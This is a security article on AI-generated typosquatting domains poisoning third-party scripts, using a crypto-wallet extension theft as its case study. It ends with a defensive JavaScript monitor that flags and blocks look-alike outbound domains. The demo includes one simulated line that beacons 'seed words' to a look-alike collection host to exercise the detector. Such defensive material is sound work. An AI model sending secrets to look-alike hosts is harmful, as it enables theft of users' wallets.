
Typosquatting Is No Longer a User Problem. It's a Supply Chain Problem
Why It Matters
Supply-chain script poisoning runs inside the user's browser, past firewalls, WAFs and CSP, and puts high-value transactions such as crypto wallets at risk; enterprises need runtime visibility into what third-party scripts actually do.
Key Takeaways
- AI can generate thousands of look-alike domains in minutes
- Malicious npm uploads rose 156% YoY, overwhelming manual review
- Trust Wallet Chrome extension theft cost $8.5M in 48 hours
- Firewalls, CSP, and EDR cannot see in-browser script behavior
- Deploy runtime behavioral monitoring for third-party scripts to close the gap
Pulse Analysis
Typosquatting, once a nuisance that relied on users mistyping URLs, has become a supply-chain threat. With large language models, attackers can generate thousands of look-alike domains in minutes, register them, obtain valid TLS certificates, and embed those hosts inside legitimate-looking third-party JavaScript or npm packages. The workflow is fast: a full campaign can be launched in under ten minutes, and malicious package uploads to public repositories have risen 156% year over year, outpacing manual vetting. This convergence of AI-generated infrastructure and open-source ecosystems forces a rethink of threat models built around the perimeter.
The danger became concrete in December 2025 when the Trust Wallet Chrome extension was compromised. A self-replicating npm worm, Shai-Hulud, stole GitHub tokens and Chrome Web Store credentials, then pushed a trojanized version of the wallet extension through the official store. Because the extension passed Google's review, it ran inside users' browsers with full trust, silently sending seed phrases to a look-alike analytics domain. Within 48 hours, 2,500 wallets were emptied, costing $8.5 million, while firewalls, WAFs, and CSP logs showed nothing: the exfiltration was ordinary HTTPS from the user's own browser to a domain with a valid certificate, and a browser extension runs outside the page's Content Security Policy altogether. The incident also showed why multi-factor authentication does not help here: a seed phrase grants full control of the wallet on its own, so no second factor is ever challenged.
Enterprises can no longer rely on perimeter defenses alone. The missing piece is runtime behavioral monitoring that watches what approved scripts actually do in the browser: which domains they contact, which DOM elements (payment fields, wallet inputs) they read, and how that deviates from an established baseline. Practical first steps are Subresource Integrity for self-hosted assets (with the caveat that SRI only fits assets whose content you can pin; tag managers and analytics loaders that change daily cannot be pinned), auditing newly registered domains that resemble your CDN and vendor hostnames, and feeding CSP violation reports into a SIEM. These must be complemented by continuous script-level telemetry, because CSP reports only what it blocked, not which script tried to send what. Machine-learning anomaly detection over that telemetry further shortens the window of exposure. As AI-driven typosquatting scales, the organizations that gain visibility into in-browser execution will be the ones that stop the next $10 million theft.
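The monitoring described above, as an added example that is not code from the article or from any vendor it mentions: a small script that wraps `fetch()` and `navigator.sendBeacon()`, classifies every outbound destination against a baseline of trusted domains, flags look-alikes (confusable characters such as "rn" for "m", and one-edit variants including TLD swaps) and optionally blocks them. The domain names, the baseline, and the fake `window` used by `demo()` are all constructed for illustration; the "last two labels" rule for the registrable domain is a stated simplification of what the Public Suffix List provides.

```javascript
// Added example: a minimal in-browser outbound monitor for third-party scripts.
// All domain names below are constructed for illustration.

// Visually confusable substitutions applied before comparing domain labels.
const CONFUSABLES = [[/rn/g, 'm'], [/vv/g, 'w'], [/0/g, 'o'], [/1/g, 'l'], [/3/g, 'e'], [/5/g, 's']];

function skeleton(label) {
  let s = label.toLowerCase();
  for (const [re, rep] of CONFUSABLES) s = s.replace(re, rep);
  return s;
}

// Standard single-row Levenshtein edit distance.
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0]; row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = row[j];
      row[j] = Math.min(row[j] + 1, row[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = tmp;
    }
  }
  return row[b.length];
}

// Simplification: registrable domain = last two labels. Real code should use the
// Public Suffix List so that e.g. "example.co.uk" is handled correctly.
function registrable(host) {
  return host.toLowerCase().split('.').slice(-2).join('.');
}

// 'allowed' if the registrable domain is in the baseline; 'lookalike' if its first
// label is a confusable or one-edit variant of a trusted label (this also catches
// TLD swaps such as example.net for example.com); otherwise 'unknown'.
function classifyHost(host, trusted) {
  const dom = registrable(host);
  if (trusted.includes(dom)) return 'allowed';
  const label = dom.split('.')[0];
  for (const t of trusted) {
    const tLabel = t.split('.')[0];
    if (skeleton(label) === skeleton(tLabel) || levenshtein(label, tLabel) <= 1) return 'lookalike';
  }
  return 'unknown';
}

// Wraps fetch and sendBeacon on `target` (window in a browser) and returns the event
// log. onEvent fires for every non-allowed destination; with block=true, look-alike
// destinations are refused (fetch rejects, sendBeacon returns false).
function installOutboundMonitor(target, { trusted, onEvent, block = false }) {
  const events = [];
  const base = (target.location && target.location.href) || 'https://localhost/';
  const urlOf = (x) => (typeof x === 'string' ? x : x && x.url ? x.url : String(x));
  const record = (api, url) => {
    let host;
    try { host = new URL(String(url), base).hostname; } catch { host = String(url); }
    // Best-effort initiator: stack frame 3 is the wrapper's caller, i.e. the script
    // that issued the request (in a browser that line carries the script's URL).
    const initiator = (new Error().stack || '').split('\n').slice(3, 4).join('').trim();
    const ev = { api, host, verdict: classifyHost(host, trusted), initiator };
    events.push(ev);
    if (ev.verdict !== 'allowed') onEvent(ev);
    return ev;
  };
  const origFetch = target.fetch;
  target.fetch = function (input, init) {
    const ev = record('fetch', urlOf(input));
    if (block && ev.verdict === 'lookalike') {
      return Promise.reject(new Error(`blocked look-alike destination ${ev.host}`));
    }
    return origFetch.call(this, input, init);
  };
  if (target.navigator && typeof target.navigator.sendBeacon === 'function') {
    const origBeacon = target.navigator.sendBeacon;
    target.navigator.sendBeacon = function (url, data) {
      const ev = record('sendBeacon', url);
      if (block && ev.verdict === 'lookalike') return false;
      return origBeacon.call(this, url, data);
    };
  }
  return events;
}

// Offline demo against a fake window: a trusted CDN fetch, a seed-phrase beacon to a
// confusable domain, a fetch to a one-edit variant, and a fetch to an unrelated host.
function demo() {
  const sent = [];
  const fakeWindow = {
    fetch: (input) => { sent.push(typeof input === 'string' ? input : input.url); return Promise.resolve({ ok: true }); },
    navigator: { sendBeacon: (url) => { sent.push(url); return true; } },
  };
  const alerts = [];
  const events = installOutboundMonitor(fakeWindow, {
    trusted: ['example.com', 'metrics-cdn.net'], // constructed baseline
    block: true,
    onEvent: (ev) => alerts.push(ev),
  });
  fakeWindow.fetch('https://cdn.example.com/app.js');
  const beaconOk = fakeWindow.navigator.sendBeacon('https://exarnple.com/collect', 'seed words');
  fakeWindow.fetch('https://metrics-cdm.net/t').catch(() => {});
  fakeWindow.fetch('https://totally-other.org/x');
  return { events, alerts, sent, beaconOk };
}

if (typeof require !== 'undefined' && require.main === module) console.log(demo());
```

In a real page this has to be the first script in `<head>`, before any third-party tag loads: a script that runs earlier can capture the original `fetch` and bypass the wrapper, and the same applies to `XMLHttpRequest`, `WebSocket`, `<img>` and `<form>` submissions, which a production monitor would wrap as well. It also illustrates the limits the article draws: this telemetry records which script contacted which host, something a CSP `connect-src` report cannot tell you, but it still sees nothing from a compromised browser extension, which executes outside the page entirely.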